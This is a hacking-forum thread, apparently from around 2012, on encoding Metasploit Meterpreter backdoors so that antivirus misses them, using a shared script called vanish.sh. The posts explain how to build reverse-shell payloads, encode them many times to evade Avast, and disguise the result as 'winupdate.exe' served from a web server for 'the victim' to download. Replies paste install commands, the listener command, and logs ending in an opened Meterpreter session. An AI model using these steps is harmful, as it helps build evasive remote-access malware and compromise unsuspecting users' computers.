
Thread: Undetectable Backdoor Encoding with Metasploit Framework

  1. #1
    deathcorps (Just burned his ISO)
    Join Date: Dec 2010
    Posts: 12

    Undetectable Backdoor Encoding with Metasploit Framework

    Today we are gonna be encoding backdoors using the Metasploit Framework on BackTrack 5!

    First we take a look at crafting a simple payload into a backdoor, and when loading it into a sandbox (Windows XP) the anti-virus doesn’t even allow the file to be downloaded.

    Well, that’s not any good is it? Who’s gonna open the file if there are flags all over it?

    So we have to make this file undetectable, at least to the client’s anti-virus which is Avast. Recently I found a public script in Pastebin and after looking at it for a few minutes, I thought the file was really legit. Especially after seeing all the encoding going on at line 43… so I modified it for my own use — big ups to Astrobaby, don’t know who you are or where you’re from but keep it up!

    Run metasploit framework console, use the exploit/multi/handler method, and set the payload to windows/meterpreter/reverse_https. It is also a good idea to use the ‘launch_and_migrate.rb’ script, so we can migrate to a new process as soon as we get a chance. We encoded that backdoor like 1000 times so it can’t be that stable.

    Now with an undetectable backdoor we just get creative and find a way to send it to the victim.

    Video & Article: http://technicdynamic.com/2012/02/un...oit-framework/

    Script download: http://technicdynamic.com/wp-content...02/scripts.zip

  2. #2
    m0j4h3d (Member)
    Join Date: Jan 2010
    Posts: 84

    Re: Undetectable Backdoor Encoding with Metasploit Framework

    Great post man, but what about this:

    mv: cannot stat `final.exe': No such file or directory
    final.c ...generated in seclabs subfolder
    final.c sha1checksum is .. 1906ae3935857cb5f84606462f308cabb606fe51 final.c
    strip:final.c: File format not recognized
    starting the meterpreter listener...
    Done! Now launch msfconsole > exploit/multi/handler

    !!!!!
    ---> 3v3RY D4y P4ss3S 1 f0uNd N3W th1NGs <---
    Knowing how 2 use BT dsnt mean that u r hacker

  3. #3
    deathcorps (Just burned his ISO)
    Join Date: Dec 2010
    Posts: 12

    Re: Undetectable Backdoor Encoding with Metasploit Framework

    Yea, sorry about that! Forgot to mention you have to install these libs:

    apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

    Try it then

  4. #4
    Just burned his ISO
    Join Date: Mar 2012
    Posts: 4

    Re: Undetectable Backdoor Encoding with Metasploit Framework

    11 / 42 detection rating on AV :-((
    It's not good.
    How do I change it to have a very nice tool?

  5. #5
    Manijak (Just burned his ISO)
    Join Date: Feb 2010
    Location: Serbia
    Posts: 7

    Re: Undetectable Backdoor Encoding with Metasploit Framework

    Same problem as m0j4h3d.


    root@bt:/pentest/exploits/framework2# ./vanish.sh
    ************************************************************
    Fully Undetectable Metasploit Payload generaor Beta
    Original Concept and Script by Astr0baby
    Stable Version of Script is Edited by Vanish3r
    Video Tutorial by Vanish3r - www.securitylabs.in
    Powered by TheHackerNews.com and securitylabs.in
    ************************************************************
    Network Device On your Computer :
    lo:
    eth1:
    Which Interface to use ? eth1
    What Port Number are we gonna listen to? : 4444
    Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 5000
    How many times you want to encode ? 1-20 : 10
    Current Ip is : 192.168.227.128
    Unknown option: c
    Unknown option: c
    Unknown option: c
    Unknown option: c
    [*] Invalid encoder specified
    [*] Invalid encoder specified
    [*] Invalid encoder specified
    [*] Invalid encoder specified

    Usage: ./msfpayload <payload> [var=val] <S|C|P|R|X>

    Payloads:
    bsd_ia32_bind BSD IA32 Bind Shell
    bsd_ia32_bind_stg BSD IA32 Staged Bind Shell
    bsd_ia32_exec BSD IA32 Execute Command
    bsd_ia32_findrecv BSD IA32 Recv Tag Findsock Shell
    .
    .
    .
    mv: cannot stat `final.exe': No such file or directory
    final.c ...generated in seclabs subfolder
    final.c sha1checksum is .. 415f379b763391d4daa56459c68d2ff19e611b5e final.c
    strip:final.c: File format not recognized
    starting the meterpreter listener...
    Done! Now launch msfconsole > exploit/multi/handler
    and I installed
    apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

    Anyone have a suggestion? Running BT5R2 Gnome 32.

  6. #6
    zimmaro (Good friend of the forums)
    Join Date: Mar 2010
    Location: milano
    Posts: 407

    Re: Undetectable Backdoor Encoding with Metasploit Framework

    Hi Manijak,
    the script worked fine! I use bt5-r2 too... if you have installed everything (all the mingw32 packages etc.), try to copy vanish.sh into the metasploit 4.3.0-dev directory,
    /opt/metasploit/msf3, or create a link like me to /pentest/exploit/framework

    root@bt:~# cd /pentest/exploits/framework
    root@bt:/pentest/exploits/framework# ls
    armitage javaAttack.sh msfd msfpescan nul test
    crypter.py lib msfelfscan msfrop plugins tools
    data modules msfencode msfrpc README vanish.sh
    documentation msfbinscan msfgui msfrpcd scripts
    external msfcli msfmachscan msfupdate seclabs
    HACKING msfconsole msfpayload msfvenom structure.c
    root@bt:/pentest/exploits/framework# ./vanish.sh
    # Automated Backdoor & Exploitation by astr0baby, vanish3r & deathc0rps
    * Enter IP/DNS address: 192.168.1.122
    * Enter port number: 4444
    > Now, type a random number from 1~100000 for encoding purposes. DON'T SKIP!
    * Enter random seed: 6000
    * Encode how many times? [1-20]: 5
    > Creating payload and encoding...
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    [*] x86/jmp_call_additive succeeded with size 457 (iteration=1)
    [*] x86/jmp_call_additive succeeded with size 489 (iteration=2)
    [*] x86/jmp_call_additive succeeded with size 521 (iteration=3)
    [*] x86/jmp_call_additive succeeded with size 553 (iteration=4)
    [*] x86/jmp_call_additive succeeded with size 585 (iteration=5)
    [*] x86/call4_dword_xor succeeded with size 614 (iteration=1)
    [*] x86/call4_dword_xor succeeded with size 642 (iteration=2)
    [*] x86/call4_dword_xor succeeded with size 670 (iteration=3)
    [*] x86/call4_dword_xor succeeded with size 698 (iteration=4)
    [*] x86/call4_dword_xor succeeded with size 726 (iteration=5)
    [*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)

    > Payload created.
    > Creating directory seclabs...
    > Encoding and compiling, this might take a while...
    backdoor.exe > ...finished compiling to folder: seclabs/
    backdoor.exe > sha1checksum is... 77b8421777dd3e72fe724b01929e5a726483e8e0 backdoor.exe
    > Copying the file to /var/www/ and creating update.zip
    adding: winupdate.exe (deflated 52%)

    NOW START APACHE2 SERVER & THE LISTENER....
    root@bt:/pentest/exploits/framework#/etc/init.d/apache2 start
    root@bt:/pentest/exploits/framework# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.122 E
    (in the script it is ##commented out; uncomment it)
    REDIRECT "VICTIM ON ""ATTACKER_WEB_SERVER"........................ ...& down/execute
    [*] Please wait while we load the module tree...
    =[ metasploit v4.3.0-dev [core:4.3 api:1.0]
    + -- --=[ 823 exploits - 467 auxiliary - 141 post
    + -- --=[ 250 payloads - 27 encoders - 8 nops
    =[ svn r15075 updated yesterday (2012.04.06)

    PAYLOAD => windows/meterpreter/reverse_tcp
    LPORT => 4444
    LHOST => 192.168.1.122
    [*] Started reverse handler on 192.168.1.122:4444
    [*] Starting the payload handler...
    [*] Sending stage (752128 bytes) to 192.168.1.4
    [*] Meterpreter session 1 opened (192.168.1.122:4444 -> 192.168.1.4:1523) at 2012-04-08 11:46:30 +0200

    meterpreter >

    More AV detects this!!!!!!!! Bye

  7. #7
    killtrace (Just burned his ISO)
    Join Date: May 2012
    Posts: 4

    Re: Undetectable Backdoor Encoding with Metasploit Framework

    OK, I go cd /pentest/exploits/framework2 (yes, the name of my folder is framework2 o.0) > ls > I can see vanish.sh, I made it executable > ./vanish > interface: etho1 > port: 4444 > random number 6000 > encode 5 > and same thing as manijak


    mv: cannot stat `final.exe': No such file or directory
    final.c ...generated in seclabs subfolder
    final.c sha1checksum is .. ed36ca59436649e3d5516ee0a96c95ecbcf77a5e final.c
    strip:final.c: File format not recognized
    starting the meterpreter listener...
    Done! Now launch msfconsole > exploit/multi/handler

    and I have installed all of mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils and still I get this.
    I use backtrack 5 r2 gnome x64.
